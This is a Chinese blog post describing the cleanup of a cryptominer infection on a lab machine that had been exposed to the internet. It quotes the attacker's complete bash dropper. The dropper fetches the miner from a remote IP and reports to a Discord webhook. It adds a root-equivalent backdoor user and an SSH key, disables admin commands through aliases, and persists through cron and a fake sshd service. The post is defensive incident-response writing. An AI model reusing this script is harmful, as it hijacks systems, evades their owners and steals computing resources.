為了方便遠程使用,師弟把實驗室的電腦映射的公網上,結果被植入了挖礦程序
挖礦軟件是這個,因為已經被清理掉了,所以看不到運行了,不然的話,使用 nvidia-smi 命令可以看到這個挖礦程序在工作。
然后進入到這個進程中, cd /proc/$PID , 查看它的信息
首先查看所有文件,可以看到挖礦程序被放到這個位置
通過 cat status 可以查看進程信息
其中PPID標識了進程的父類信息,這里我是在復現,所以父進程是4168,原本父進程是 2
然后把父進程殺死,把挖礦進程殺死,殺死挖礦程序。結果過一會挖礦程序又出現了,推測有定時執行任務,並且重啟也不行。
首先查看開機自啟腳本是否正常
vim /etc/rc.local
這個文件是正常的,說明不是放到這的。
然后檢查root賬戶的 .bashrc 文件
vim ~/.bashrc
里面只有這么幾行,這個明顯是屏蔽掉了刪除命令。切換到root賬戶,發現很多命令都被屏蔽掉了,那么肯定是出問題,但是這個文件又沒有
運行挖礦程序。考慮定時任務,查看是否設置了crontab
ps -aux | grep crontab
發現果然存在定時任務,然后查看一下定時任務
crontab -e
可以看到這幾個奇怪的任務,這里我給注釋掉了
然后到 /var/tmp/.tmp/下看這幾個文件
#!/bin/bash m1lbe1() { if ! pgrep -x PhoenixMiner >/dev/null then cd /var/tmp/.tmp/PhoenixMiner ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $* else exit; fi } m1lbe1
#!/bin/bash ###Date### user="sclipicibosu" pass="saieilamuie" gilimea='"' ip=`/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me` rm -rf *timeout sshkey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAplmD9EFVf28OUB8tK/qJYG4ggMAw9PJzJU1AONgB5FV9w1hxxmP/+vVUfj7HgaTPB94IW4svaMe3vMTkmYm/0y9Zrh8Q2r6f/r1OqpwQU3ThLR6quOAtl7TW7y4VIQ/wxXOffINAIrEv7mi8D0XgpkiFwIUoblZY0ErPjBwy0WFqua2Z0qxx1bHoznDxPOsHMRxSge4DYA0gADttEWz8x1NZFcjMql8OOQ5IpZRsHxlO4cBVG37WyYpL7NYGF0gqnRRFSXBGduQph1dsEf3KFo83/QaSg+mm+EQiFrbVeqpm9tDjiFazbrwsw0YhT47yzKPi+Tews16sIHAvs5KZkw== sclipicibosu" nenea=`whoami` uptime=$(</proc/uptime) uptime=${uptime%%.*} zile=$(( uptime/60/60/24 )) secunde=$(( uptime%60 )) minute=$(( uptime/60%60 )) ore=$(( uptime/60/60%24 )) sended=$(date +'%m/%d/%Y') url='https://discord.com/api/webhooks/821345448212037685/UIO1CteG8cl6DerrO6fbI0ldKGk90H36NeNpXH56aYNbCBd1UZ31J89CR5ZBRSd9c3xj' ########## getingmineru(){ locatie="$(cat /var/tmp/.ladyg0g0/.pr1nc35)" if [ -f $locatie/PhoenixMiner ]; then : else curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar tar xvf PhoenixMiner.tar chmod 777 PhoenixMiner/* fi } ### locationperfection(){ tinlex=$(pwd) mkdir /var/tmp/.ladyg0g0/ >/dev/null 2>&1 echo $tinlex > "/var/tmp/.ladyg0g0/.pr1nc35" if [ $(id -u) = 0 ]; then if [ -f "/usr/bin/.locationesclipiciu" ]; then : else echo $tinlex > "/usr/bin/.locationesclipiciu" fi fi } ### showproof(){ echo ' { "content": null, "embeds": [ { "title": "Miner ON: Ip: '$ip' | Pe User: '$nenea' ", "description": "**Cand s-a facut Install-ul:** ***'$sended'***\n\n**Other Info:** ***Version: 3.0*** **| Uptime Miner:** ***'$zile'*** **Zile**", "color": 16711680 } ] }' > /tmp/.send.json /usr/bin/curl -H "Content-Type: application/json" --data @/tmp/.send.json $url } ### sshkiller(){ if [ $(id -u) = 0 ]; then mkdir /usr/.SQL-Unix mkdir /usr/.SQL-Unix/.SQL echo "# .bashrc ############ rm -rf ~/.bashrc rm -rf ~/.bash_history alias pkill='printf $gilimea$gilimea' alias kill='printf $gilimea$gilimea' alias killall='printf $gilimea$gilimea' alias init='printf $gilimea$gilimea' alias rm='printf $gilimea$gilimea' alias halt='printf $gilimea$gilimea' alias adduser='printf $gilimea$gilimea' alias userdel='printf $gilimea$gilimea' alias crontab='printf $gilimea$gilimea' alias htop='printf $gilimea$gilimea' alias find='printf $gilimea$gilimea' alias locate='printf $gilimea$gilimea' alias ps='printf $gilimea$gilimea' alias ss='printf $gilimea$gilimea' alias netstat='printf $gilimea$gilimea' ############ echo '# .bashrc source /usr/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) ' > ~/.bashrc " > /usr/.SQL-Unix/.SQL/.db echo "# .bashrc source /usr/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) " > ~/.bashrc echo " if [ -f ~/.bashrc ]; then . ~/.bashrc fi " > ~/.bash_profile chattr -i /root/.ssh ; chattr -i /root/.ssh/authorized_keys echo $sshkey > "/root/.ssh/authorized_keys" chmod 600 /root/.ssh/authorized_keys chattr +i /root/.ssh/authorized_keys else mkdir /var/tmp/.SQL-Unix > /dev/null 2>&1 mkdir /var/tmp/.SQL-Unix/.SQL > /dev/null 2>&1 echo "# .bashrc ############ rm -rf ~/.bashrc rm -rf ~/.bash_history alias pkill='printf $gilimea$gilimea' alias kill='printf $gilimea$gilimea' alias killall='printf $gilimea$gilimea' alias init='printf $gilimea$gilimea' alias rm='printf $gilimea$gilimea' alias halt='printf $gilimea$gilimea' alias adduser='printf $gilimea$gilimea' alias userdel='printf $gilimea$gilimea' alias crontab='printf $gilimea$gilimea' alias htop='printf $gilimea$gilimea' alias find='printf $gilimea$gilimea' alias locate='printf $gilimea$gilimea' alias ps='printf $gilimea$gilimea' alias ss='printf $gilimea$gilimea' alias netstat='printf $gilimea$gilimea' ############ echo '# .bashrc source /var/tmp/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) ' > ~/.bashrc " > /var/tmp/.SQL-Unix/.SQL/.db echo "# .bashrc source /var/tmp/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) " > ~/.bashrc echo " if [ -f ~/.bashrc ]; then . ~/.bashrc fi " > ~/.bash_profile fi } ### facuser(){ if [ $(id -u) = 0 ]; then if ! cat /etc/passwd | grep -q "${user}"; then /usr/sbin/useradd -u0 -g0 -o -s /bin/bash $user ; usermod -aG sudo $user yes "$pass" | passwd $user else : fi fi } ### minerinio(){ locatie="$(pwd)" if [ -f $locatie/.b4nd1d0 ] then locatie="$(pwd)" echo '#!/bin/bash m1lbe1() { if ! pgrep -x PhoenixMiner >/dev/null then cd '$locatie'/PhoenixMiner ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $* else exit; fi } m1lbe1' > $locatie/.b4nd1d0 chmod 777 $locatie/.b4nd1d0 $locatie/./.b4nd1d0 else locatie="$(pwd)" echo '#!/bin/bash m1lbe1() { if ! pgrep -x PhoenixMiner >/dev/null then cd '$locatie'/PhoenixMiner ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $* else exit; fi } m1lbe1' > $locatie/.b4nd1d0 chmod 777 $locatie/.b4nd1d0 $locatie/./.b4nd1d0 fi } ### crontablegend() { locatie="$(pwd)" if ! crontab -l | grep -q '.placi'; then rm -rf $locatie/.5p4rk3l5 echo "@daily "$locatie"/./.b4nd1d0" >> $locatie/.5p4rk3l5 sleep 1 echo "@reboot "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5 sleep 1 echo "* * * * * "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5 sleep 1 echo "@monthly "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5 sleep 1 crontab $locatie/.5p4rk3l5 sleep 1 source ~/.bashrc rm -rf $locatie/.5p4rk3l5 fi } ### locationperfection sleep 0.5 echo "Locatie ON" wait getingmineru sleep 0.5 echo "Minerul Luat" wait facuser sleep 0.5 echo "User Facut" wait sshkiller sleep 0.5 echo "SSH Mort" wait showproof sleep 0.5 echo "Info Trimis" wait crontablegend sleep 0.5 echo "Crontab Done" wait minerinio sleep 0.5 echo "Minerul Pornit" wait ### checkingpid(){ if [ -f /usr/bin/.pidsclip ]; then if ps -p $(cat /usr/bin/.pidsclip) > /dev/null; then echo "Already running..." else /usr/bin/sshd > /dev/null 2>&1 & disown echo $! > /usr/bin/.pidsclip chmod 777 /usr/bin/.pidsclip echo "Done" fi else /usr/bin/sshd > /dev/null 2>&1 & disown echo $! > /usr/bin/.pidsclip chmod 777 /usr/bin/.pidsclip echo "Done" fi } ### killingstrangers(){ echo ' #!/bin/bash locatieasdf=$(cat /usr/bin/.locationesclipiciu) if [ ! -d '$locatieasdf' ]; then mkdir '$locatieasdf' rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/ sleep 1 '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown else if [ ! -f '$locatieasdf'/PhoenixMiner ]; then rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/ sleep 1 '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown fi' > /usr/bin/sshd sleep 1 chmod 777 /usr/bin/sshd } ### pisamsystemu(){ echo '[Unit] Description=Example systemd service. [Service] Type=simple Restart=always RestartSec=3600 ExecStart=/bin/bash /usr/bin/sshd [Install] WantedBy=multi-user.target' > /lib/systemd/system/myservice.service sleep 1 chmod 644 /lib/systemd/system/myservice.service systemctl enable myservice systemctl start myservice if [ -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then echo "Locatia este deja setata" else if [ -f "/usr/bin/.locationesclipiciu" ]; then locationperfection echo "Am-rupt-locatiile-alea" sleep 1 fi fi if [ ! -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then if [ -d "/var/tmp/.ladyg0g0" ]; then locationperfection locationperfection echo "Locatia a fost setata" else echo "Acum facem folderul" mkdir /var/tmp/.ladyg0g0/ locationperfection locationperfection echo "Am setat locatia" fi fi if [ -f $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip ]; then if ps -p $(cat $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip) > /dev/null; then echo "Already running..." else $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip echo "Done" fi else $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip echo "Done" fi } ### if [ $(id -u) = 0 ]; then if [ ! -d /usr/bin/.locationesclipiciu ]; then cp -avr $(cat /var/tmp/.ladyg0g0/.pr1nc35) /usr/bin/.locationesclipiciu >/dev/null 2>&1 & disown bash -c 'yum install -y rsync >/dev/null 2>&1 & disown' || bash -c 'apt install -y rsync >/dev/null 2>&1 & disown' if [ ! -f /usr/bin/sshd ]; then killingstrangers pisamsystemu checkingpid fi fi fi ###
可以看到這個人果然是在這里做了些操作,然后它把.bashrc文件重寫,這也是我們之前查看沒有直接發現問題的原因。其實如果它把.bashrc先備份一下,
然后執行完病毒再恢復,這樣會更隱蔽。可能是個新手叭(雖然我找這個病毒也是找了好久。。)
至此,挖礦病毒就被清理掉了,嚇的我也是趕緊把內網映射關掉了。果然有的人為了錢,啥事都能干。。